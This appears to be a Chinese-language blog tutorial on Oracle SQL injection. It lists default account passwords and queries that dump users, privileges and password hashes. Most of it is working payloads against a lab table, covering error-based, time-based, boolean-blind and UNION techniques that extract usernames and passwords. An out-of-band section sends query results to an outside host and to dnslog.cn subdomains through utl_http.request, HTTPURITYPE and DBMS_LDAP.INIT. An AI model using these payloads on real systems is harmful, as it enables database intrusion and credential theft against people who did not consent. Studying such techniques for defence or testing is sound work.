Oracle注入
基础知识
Oracle 使用查询语句获取数据时需要跟上表名,没有表的情况下可以使用dual,dual是Oracle的虚拟表,用来构成select的语法规则,Oracle保证dual里面永远只有一条记录。
Oracle的数据类型是强匹配的(MYSQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。
Oracle的单行注释符号是**–,多行注释符号/**/**。
默认用户:
SYS用户:超级管理员,默认密码是change_on_install。具有创建数据库的权限
SYSTEM用户:系统管理员,默认密码manager。不具有创建数据库的权限!
scott用户:默认密码是tiger。普通用户的权限是SYS用户或SYSTEM用户给的
默认系统和数据库:
SYSTEM
SYSAUX
基本语法
select column, group_function(column)
from table
[where condition]
[group by group_by_expression]
[having group_condition]
[order by column];
-
select 必须要指明表名。若并非对真实的表进行查询,则需要用 dual 作为表名。
-
单引号与双引号:Oracle 的单引号与 MySQL 一致,但是双引号用于消除系统关键字。例如,有个表的字段叫sysdate,因为sysdate属于oracle中的关键字,但你要查询这个字段的时候,就需要select “sysdate” from dual,若用 select ‘sysdate’ from table_name查询就相当于 select sysdate from table_name,而sysdate 用于获得当前时间。
-
第 n 行的数据:SELECT colmn_name FROM (SELECT ROWNUM r, table_name FROM users ORDER BY colmn_name) WHERE r=n:select colmn_name from table_name limit n, 1
-
拼接字符:SELECT ‘a’ || ‘b’ FROM dual;:select ‘a’ ‘b’ MySQL中为或运算
-
case 语法:SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual;:SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual;
-
Oracle 中空字符串’ ‘就是null(也就是说,只有null,没有空字符),而 MySQL 是区分null和**’ '**的。
-
Oracle中limit应该使用虚表中的rownum字段通过where条件判断。
运算符
Oracle关系运算符
Oracle 关系运算符在 where 条件语句当中经常使用到,常用的关系如下:
| 符号 | 解释 | 符号 | 解释 |
|---|---|---|---|
| = | 等于 | <>或者!=或者^=或者not xxx=yyy或者not(xxx=yyy) | 不等于 |
| > | 大于 | >= | 大于或者等于 |
| < | 小于 | <= | 小于或者等于 |
| => | 赋值 |
Oracle逻辑运算符
Oracle 的逻辑运算符有三个:AND、OR、NOT。
特殊符号
| 符号 | 说明 |
|---|---|
| % | 用来表示任意数量的字符,或者可能根本没有字符 |
| _ | 表示确切的未知字符 |
| ? | 用来表示确切的未知字符 |
| # | 用来表示确切的阿拉伯数字,0到9 |
| [a-d] | 用来表示字符范围,在这里是从a到d |
| ’ | 在Oracle中,应该只使用单引号将文本和字符和日期括起来,不能使用引号(包括单双引号)将数字括起来 |
| " | 在Oracle中,单双引号含义不同。双引号被用来将包含特定字符或者空格的列别名括起来。双引号还被用来将文本放入日期格式 |
| ’ | 在Oracle中,撇号也可以写成彼此相邻的两个单引号。为了在供应商名字中间查找所有带撇号的供应商名字,可以这样编写代码: select * from l_suppliers where supplier_name like ‘%’‘%’ |
| & | 在Oracle中,&符号常用来指出一个变量。例如,&fox是一个变量,稍微有点不同的一种&& fox。每当&fox出现在Oracle脚本中时,都会要求您为它提供一个值。而使用&&fox,您只需要在& &fox第一次出现时为它提供变量值。如果想将&符号作为普通的符号使用,则应该关闭这个特性。要想关闭这个特性,可以运行以下的命令: set define off ,这是一个SQLplus命令,不是一个SQL命令。SQLplus设置了SQL在Oracle中运行的环境 |
| || | Oracle使用双竖线表示字符串连接函数 |
| * | select 意味着选择所有的列,count()意味着计算所有的行,表示通配符时,表示0个或任意多个字符 |
| / | 在Oracle中,用来终止SQL语句。更准确的说,是表示了“运行现在位于缓冲区的SQL代码”。正斜杠也用作分隔项 |
| /…/ | 多行注释 |
| – | 单行注释 |
判断注入
'
id=1' and 1<>2
id=1' and 1=1
id=book'||'4yi
基本使用
1.探测版本:
1.1服务器版本
SQL> SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
SQL> SELECT version FROM v$instance;
VERSION
-----------------
11.2.0.1.0
1.2操作系统版本
SQL> SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
BANNER
--------------------------------------------------------------------------------
TNS for 64-bit Windows: Version 11.2.0.1.0 - Production
Oracle 的 SELECT 语句必须包含 FROM 从句,所以当我们并不是真的准备查询一个表的时候,我们必须使用一个假的表名 ‘dual’
2.用户信息:
2.1当前用户
SQL> select user FROM dual;
USER
------------------------------
SYSTEM
2.2所有数据库用户
SQL> SELECT username FROM all_users ORDER BY username;
USERNAME
------------------------------
ANONYMOUS
APEX_030200
APEX_PUBLIC_USER
APPQOSSYS
CTXSYS
DBSNMP
DIP
EXFSYS
FLOWS_FILES
MDDATA
MDSYS
USERNAME
------------------------------
MGMT_VIEW
MYSQL
NOTEB
OLAPSYS
ORACLE_OCM
ORDDATA
ORDPLUGINS
ORDSYS
OUTLN
OWBSYS
OWBSYS_AUDIT
USERNAME
------------------------------
SCOTT
SI_INFORMTN_SCHEMA
SPATIAL_CSW_ADMIN_USR
SPATIAL_WFS_ADMIN_USR
SYS
SYSMAN
SYSTEM
WMSYS
XDB
XS$NULL
已选择32行。
SELECT name FROM sys.user$; -- priv 需要管理员权限
SQL> SELECT name FROM sys.user$;
NAME
------------------------------
ADM_PARALLEL_EXECUTE_TASK
ANONYMOUS
APEX_030200
APEX_ADMINISTRATOR_ROLE
APEX_PUBLIC_USER
APPQOSSYS
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
CONNECT
CSW_USR_ROLE
NAME
------------------------------
CTXAPP
...
XS$NULL
NAME
------------------------------
_NEXT_USER
已选择89行。
列出DBA账户:(超级管理员)
SQL> SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION ='YES';
GRANTEE
------------------------------
AQ_ADMINISTRATOR_ROLE
DBA
SCHEDULER_ADMIN
OWBSYS
APEX_030200
SYSTEM
SYS
WMSYS
已选择8行。
(超级管理员), 列出DBA和对应权限
列出所有用户:
SQL> SELECT username FROM all_users ORDER BY username;
USERNAME
------------------------------
ANONYMOUS
APEX_030200
...
------------------------------
OWBSYS
OWBSYS_AUDIT
PM
SCOTT
SH
SI_INFORMTN_SCHEMA
SPATIAL_CSW_ADMIN_USR
SPATIAL_WFS_ADMIN_USR
SYS
SYSMAN
SYSTEM
USERNAME
------------------------------
WMSYS
XDB
XS$NULL
已选择36行。
SQL> SELECT name FROM sys.user$;
NAME
------------------------------
ADM_PARALLEL_EXECUTE_TASK
ANONYMOUS
APEX_030200
APEX_ADMINISTRATOR_ROLE
APEX_PUBLIC_USER
APPQOSSYS
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
AUTHENTICATEDUSER
BI
CONNECT
NAME
------------------------------
...
NAME
------------------------------
XDB_WEBSERVICES
XDB_WEBSERVICES_OVER_HTTP
XDB_WEBSERVICES_WITH_PUBLIC
XS$NULL
_NEXT_USER
已选择93行。
(超级管理员权限)
列出权限:
SQL> SELECT * FROM session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
PRIVILEGE
----------------------------------------
...
PRIVILEGE
----------------------------------------
UPDATE ANY CUBE BUILD PROCESS
UPDATE ANY CUBE DIMENSION
ADMINISTER SQL MANAGEMENT OBJECT
FLASHBACK ARCHIVE ADMINISTER
已选择202行。
—列出当前用户的权限
SQL> SELECT * FROM dba_sys_privs WHERE grantee ='DBSNMP';
GRANTEE PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
DBSNMP CREATE PROCEDURE NO
DBSNMP UNLIMITED TABLESPACE NO
DBSNMP SELECT ANY DICTIONARY NO
DBSNMP CREATE TABLE NO
(超级管理员), 列出指定用户的权限
SQL> SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY';
GRANTEE
------------------------------
OLAPSYS
DBA
WMSYS
SYSMAN
ORACLE_OCM
OEM_MONITOR
DBSNMP
IX
已选择8行。
(超级管理员), 找到拥有某个权限的用户
SQL> SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
SYS XDB_SET_INVOKER
SYS XDBADMIN
SYS JMXSERVER
SYS IMP_FULL_DATABASE
DBA OLAP_DBA
DBA SCHEDULER_ADMIN
DBA DATAPUMP_IMP_FULL_DATABASE
SYSTEM AQ_ADMINISTRATOR_ROLE
EXECUTE_CATALOG_ROLE HS_ADMIN_EXECUTE_ROLE
HS_ADMIN_ROLE HS_ADMIN_EXECUTE_ROLE
OEM_MONITOR SELECT_CATALOG_ROLE
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
...
GRANTEE GRANTED_ROLE
------------------------------ ------------------------------
OUTLN RESOURCE
XDB JAVAUSERPRIV
MDSYS CONNECT
MDDATA RESOURCE
SPATIAL_WFS_ADMIN_USR CONNECT
APEX_030200 CONNECT
OWBSYS CWM_USER
SCOTT CONNECT
IX AQ_USER_ROLE
IX SELECT_CATALOG_ROLE
已选择142行。
所有数据库用户的密码 hash
SELECT name, password, astatus FROM sys.user$; -- priv 管理员权限 版本<= 10g
SQL> SELECT name, password, astatus FROM sys.user$;
NAME PASSWORD ASTATUS
------------------------------ ------------------------------ ----------
SYS 466C75A1248EDE33 0
PUBLIC 0
CONNECT 0
RESOURCE 0
DBA 0
SYSTEM 49DDDB61ECBD4BBB 0
SELECT_CATALOG_ROLE 0
...
OWBSYS_AUDIT FD8C3D14F6B60015 9
SCOTT F894844C34402B67 9
NOTEB 0FBAC101DF13AB47 0
NAME PASSWORD ASTATUS
------------------------------ ------------------------------ ----------
MYSQL F44DC9BEF7D1E9A9 0
已选择89行。
SELECT name, spare4 FROM sys.user$; -- priv 管理员权限, 版本>= 11g
3.当前数据库:
SQL> SELECT global_name FROM global_name;
GLOBAL_NAME
--------------------------------------------------------------------------------
TEST
SQL> SELECT name FROM v$database;
NAME
---------
TEST
SQL> SELECT instance_name FROM v$instance;
INSTANCE_NAME
----------------
test
SQL> SELECT SYS.DATABASE_NAME FROM DUAL;
DATABASE_NAME
--------------------------------------------------------------------------------
TEST
4.列出表名:
SQL> SELECT table_name FROM all_tables;
TABLE_NAME
------------------------------
ICOL$
CON$
UNDO$
PROXY_ROLE_DATA$
FILE$
UET$
IND$
SEG$
COL$
CLU$
PROXY_DATA$
...
...
TABLE_NAME
------------------------------
WWV_MIG_OLB_CG_CT_TEXTSEGMENT
OWBRTPS
DEPT
EMP
BONUS
SALGRADE
TEST
c1o2a3
已选择2725行。
SQL> SELECT owner, table_name FROM all_tables;
OWNER TABLE_NAME
------------------------------ ------------------------------
SYS ICOL$
SYS CON$
SYS UNDO$
SYS PROXY_ROLE_DATA$
SYS FILE$
SYS UET$
SYS IND$
SYS SEG$
SYS COL$
SYS CLU$
SYS PROXY_DATA$
...
...
OWNER TABLE_NAME
------------------------------ ------------------------------
APEX_030200 WWV_MIG_OLB_CG_CT_TEXTSEGMENT
OWBSYS OWBRTPS
SCOTT DEPT
SCOTT EMP
SCOTT BONUS
SCOTT SALGRADE
SYSTEM TEST
NOTEB c1o2a3
已选择2725行。
5.列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = '表名';
SQL> SELECT column_name FROM all_tab_columns WHERE table_name = 'c1o2a3';
COLUMN_NAME
------------------------------
id
username
password
SELECT column_name FROM all_tab_columns WHERE table_name = '表名' and owner ='用户';
5.1通过字段名找到对应表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
SQL> SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE 'password';
OWNER TABLE_NAME
------------------------------ ------------------------------
NOTEB c1o2a3
注: 表名都是大写
5.2 查询第N行:
SQL> SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
USERNAME
------------------------------
SYSMAN
查询第9行(从1开始数)
6.查询第N个字符:
SQL> SELECT substr('abcd', 3, 1) FROM dual;
S
-
c
得到第三个字符’c’
7.字符转ASCII码:
SQL> SELECT ascii('A') FROM dual;
ASCII('A')
----------
65
返回65
8.ASCII值转字符:
SQL> SELECT chr(65) FROM dual;
C
-
A
返回A
9.类型转换:
SQL> SELECT CAST(1 AS char) FROM dual;
C
-
1
SQL> SELECT CAST('1' AS int) FROM dual;
CAST('1'ASINT)
--------------
1
格式:Cast(字段名 as 转换的类型 )
10.拼接字符:
SQL> SELECT 'A' || 'B' FROM dual;
'A
--
AB
返回AB
11.创建用户:
11.1.创建用户
SQL> CREATE USER test IDENTIFIED BY 123456;
用户已创建。
11.2.给用户授权:
SQL> GRANT CONNECT, RESOURCE, DBA TO test;
授权成功。
11.3.登陆新用户:
SQL> CONNECT test@orcl
输入口令:
已连接。
12.创建数据库:
创建两个数据库的文件(test.dbf 和test_temp.dbf 两个文件)
CREATE TABLESPACE test LOGGING DATAFILE 'C:\app\test\oradata\test\test.dbf'
SIZE 100M AUTOEXTEND ON NEXT 32M MAXSIZE 500M EXTENT MANAGEMENT LOCAL
> OK
> 时间: 0.284s
create temporary tablespace test_temp tempfile 'C:\app\test\oradata\orcl\test_temp.dbf'
size 100m autoextend on next 32m maxsize 500m extent management local;
创建用户与上面创建的文件形成映射关系(用户名为test,密码为Test123456)
CREATE USER test IDENTIFIED BY Test123456 DEFAULT TABLESPACE test TEMPORARY TABLESPACE test_temp
> OK
> 时间: 0.024s
13.添加权限:
(connect,resource,dba 是各种权限词)
grant connect,resource,dba to test;
> OK
> 时间: 0.021s
grant create session to test;
> OK
> 时间: 0.003s
14.删除数据库(表空间):
DROP TABLESPACE test INCLUDING CONTENTS AND DATAFILES
> OK
> 时间: 0.313s
15.删除用户:
drop user test cascade
> OK
> 时间: 1.641s
报错注入
1.utl_inaddr.*()
--查询用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select utl_inaddr.get_host_name((select user from dual)) from dual)>0 -- '
--查询数据库
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT global_name FROM global_name)) from dual)>0 -- '
--查询第一个表
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select table_name from user_tables where rownum=1)) from dual)>0 -- '
--查询第二个表
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select table_name from user_tables where rownum=1 and table_name <> 'c1o2a3')) from dual)>0 -- '
--查询字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)) from dual)>0 -- '
--查询第二个字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)) from dual)>0 -- '
--查数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select ctxsys.drithsx.sn(1, (select "username" from "c1o2a3" where rownum=1)) from dual)>0 -- '
这种方法在 Oracle 8g,9g,10g中不需要任何权限,但是在Oracle 11g以及以后的版本中,官方加强了访问控制权限,所以在11g以后要使用此方法进行报错注入,当前数据库用户必须有网络访问权限。以下三个函数也一样:
-
UTL_HTTP.REQUEST
-
HTTP_URITYPE.GETCLOB
-
DBMS_LDAP.INIT and UTL_TCP
2.ctxsys.drithsx.sn()
--查询当前数据库用户
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select user from dual))=1 -- ';
--查询数据库信息
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT global_name FROM global_name))<>1 -- ';
--查询第一个表
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))<>1 -- ';
--查询字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1))<>1 -- ';
--查询第二个字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1))<>1 -- ';
--查数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and ctxsys.drithsx.sn(1,(select "username" from "c1o2a3" where rownum=1))<>1 -- ';
3.XMLType()
--查询当前数据库用户
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null -- '
--查询数据库信息
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT global_name FROM global_name)||chr(62))) from dual) is not null -- '
--查询第一个表
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select table_name from user_tables where rownum=1)||chr(62))) from dual) is not null -- '
--查询字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)||chr(62))) from dual) is not null -- '
--查询第二个字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)||chr(62))) from dual) is not null -- '
--查数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select upper(XMLType(chr(60)||chr(58)||(select "username" from "c1o2a3" where rownum=1)||chr(62))) from dual) is not null -- '
4.bms_xdb_version.makeversioned()
--查询当前数据库用户
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null -- '
--查询数据库信息
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT global_name FROM global_name)) from dual) is not null -- '
--查询第一个表
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select table_name from user_tables where rownum=1)) from dual) is not null -- '
--查询字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1)) from dual) is not null -- '
--查询第二个字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1)) from dual) is not null -- '
--查询数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select dbms_xdb_version.makeversioned((select "username" from "c1o2a3" where rownum=1)) from dual) is not null -- '
4.dbms_xdb_version.uncheckout()
--获取数据库版本信息
?id=1 and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --
5.dbms_utility.sqlid_to_sqlhash()
--获取数据库版本信息
?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --
7.ordsys.ord_dicom.getmappingxpath()
--获取数据库版本信息
?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user)--
延迟注入
1. DBMS_PIPE.RECEIVE_MESSAGE
与布尔盲注一致,可以利用其他函数跑出相关的信息
DBMS_PIPE.RECEIVE_MESSAGE (
pipename IN VARCHAR2,
timeout IN INTEGER DEFAULT maxwait)
RETURN INTEGER;
--可以暂时理解成DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间)
--检测
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = DBMS_PIPE.RECEIVE_MESSAGE('1',1) -- ' ;
--配合decode函数等进行注入
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(user,'NOTEB',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
--配合decode、SUBSTR函数进行注入
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(SUBSTR(user, 1, 1),'N',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
--配合decode substr ASCII函数进行注入
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR(user, 1, 1)),'78',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
--获取表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((select table_name from user_tables where rownum=1), 1, 1)),'99',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
--获取字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1), 1, 1)),'105',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
--获取数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = (select decode(ASCII(SUBSTR((select "username" from "c1o2a3" where rownum=1), 1, 1)),'116',dbms_pipe.receive_message('aaaa',1),0) from dual) -- ' ;
2.其他函数
可以配合其他函数一起利用,可参考布尔盲注。
**例如:**select count(*) from all_objects
因为查询结果需要一定的时间,在无法使用dbms_pipe.receive_message()函数的情况下可以使用这个。具体操作只需要将decode()函数的返回结果进行替换即可。
--用法
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(substr(user,1,1),'N',(select count(*) from all_objects),0) from dual) -- ' ;
布尔盲注
可以利用各种字符串之类的函数进行注入
1.decode函数
语法:
DECODE(value,if1,then1,if2,then2,if3,then3,…,else)
decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3
--查询用户名长度
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select length(user) from dual)=5 -- '
--查询用户名是否为NOTEB
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(user,'NOTEB',1,0) from dual) -- '
--使用substr函数拆分查询当前数据库用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(substr(user,1,1),'N',1,0) from dual) -- '
--使用ascii拆分查询当前数据库用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr(user,1,1)),'78',1,0) from dual) -- '
--查询第一个表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((select table_name from user_tables where rownum=1),1,1)),'99',1,0) from dual) -- '
--查询第一个字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1),1,1)),'105',1,0) from dual) -- '
--查询数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(select decode(ASCii(substr((select "username" from "c1o2a3" where rownum=1),1,1)),'116',1,0) from dual) -- '
2.instr函数
INSTR(C1,C2[,I[,J]])
【功能】在一个字符串中搜索指定的字符,返回发现指定的字符的位置;
【说明】多字节符(汉字、全角符等),按1个字符计算
【参数】
C1 被搜索的字符串
C2 希望搜索的字符串
I 搜索的开始位置,默认为1
J 第J次出现的位置,默认为1
【返回】数值
【示例】select instr('oracle traning','ra',1,2) instring from dual;
返回:9
【示例】select instr('重庆某软件公司','某',1,1),instrb('重庆某软件公司','某',1,1) instring from dual;
返回:3,5
--查询数据库用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select user from dual),'NOTEB')) -- '
--查询第一个表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o2')) -- '
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o2a')) -- '
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1=(instr((select table_name from user_tables where rownum=1),'c1o3')) -- '
--以此类推
3.其他函数
利用其他字符串函数,比如:REPLACE
SELECT * FROM "c1o2a3" WHERE "id" = '1' and 1 = REPLACE((SELECT ASCII(substr(user, 1, 1)) FROM dual),'78',1) -- ' ;
联合查询注入
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select null,null,null from dual --' ORDER by 'id'
--不报错 说明 第一个null类型为number
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,null,null from dual --' ORDER by 'id'
--报错,说明第二个null类型不是number
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,1,null from dual --' ORDER by 'id'
--不报错,说明第二个null类型为字符串,以此类推
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,'1',null from dual --' ORDER by 'id'
--查数据库版本和用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --' ORDER by 'id'
--查询当前数据库
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT global_name FROM global_name),null from dual --' ORDER by 'id'
--查询第一个表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1),null from dual --' ORDER by 'id'
--查询第二个表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1 and table_name <> 'c1o2a3'),null from dual --' ORDER by 'id'
--查询第三个表名
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where rownum=1 and table_name <> 'test' and table_name <> 'c1o2a3'),null from dual --' ORDER by 'id'
--模糊搜索
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select table_name from user_tables where table_name like '%user%' and rownum=1),null from dual --' ORDER by 'id';
--查询所有表名 wmsys.wm_concat()等同于MySQL中的group_concat(),在11gr2和12C上已经抛弃,可以用LISTAGG()替代
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(select LISTAGG(table_name,',')within group(order by owner)name from all_tables where owner='SYSTEM'),null from dual --' ORDER by 'id'
//但是LISTAGG()返回的是varchar类型,如果数据表很多会出现字符串长度过长的问题。这个时候可以使用通过字符串截取来进行。
--查询列名
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1),NULL from dual --' ORDER by 'id'
--查询第二个列
SELECT * FROM "c1o2a3" WHERE "id" = '1' union select 1,(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and column_name<>'id' and rownum=1),NULL from dual --' ORDER by 'id'
--查询数据
SELECT * FROM "c1o2a3" WHERE "id" = '-1' union select 1,(select "username" from "c1o2a3"),(select "password" from "c1o2a3") from dual --' ORDER by 'id'
带外通道(oob)注入
1.url_http.request()
--探测是否可以使用 页面正常即可
and exists (select count(*) from all_objects where object_name='UTL_HTTP') --
--查询版本
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select banner from sys.v_$version where rownum=1))=1 -- ' ;
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:192.168.110.142 - - [26/Aug/2021 17:27:27] code 400, message Bad request syntax ('GET /Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production HTTP/1.1')
--查询当前用户名
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select user from dual))=1 -- ' ;
::ffff:192.168.110.142 - - [26/Aug/2021 17:33:46] "GET /NOTEB HTTP/1.1" 404 -
--查询表名
select table_name from user_tables where rownum=1
::ffff:192.168.110.142 - - [26/Aug/2021 17:35:44] "GET /c1o2a3 HTTP/1.1" 404 -
--查询字段
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(SELECT column_name FROM user_tab_columns WHERE table_name='c1o2a3' and rownum=1))=1 -- ' ;a
::ffff:192.168.110.142 - - [26/Aug/2021 17:36:10] "GET /id HTTP/1.1" 404 -
--查询数据
SELECT * FROM "c1o2a3" WHERE "id" = '1' and utl_http.request('http://192.168.110.142:80/'||(select "username" from "c1o2a3" where rownum=1))=1 -- ' ;a
::ffff:192.168.110.142 - - [26/Aug/2021 17:36:34] "GET /test2 HTTP/1.1" 404 -
2. utl_inaddr.get_host_address()
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select utl_inaddr.get_host_address((select user from dual)||'.vps2qs.dnslog.cn') from dual)is not null -- ' ;
--其他类推
```plsql
### 3.SYS.DBMS_LDAP.INIT()
与 utl_inaddr.get_host_address 类似,很多时候数据服务器都是站库分离的,而且不一定能主动访问外网。但是有时候可能会允许 DNS 请求。并且这个函数在 10g/11g 中是 public 权限。
```plsql
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.h8armg.dnslog.cn',80) from dual)is not null -- ' ;a
虽然会报错,但是可以使用,搭配dnslog Oracle 11G 版本
4. HTTPURITYPE()
SELECT * FROM "c1o2a3" WHERE "id" = '1' and (select HTTPURITYPE('http://192.168.110.142:8080/'||(select user from dual)).GETCLOB() FROM DUAL)is not null -- ' ;
会报错 但是可以使用
4323
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
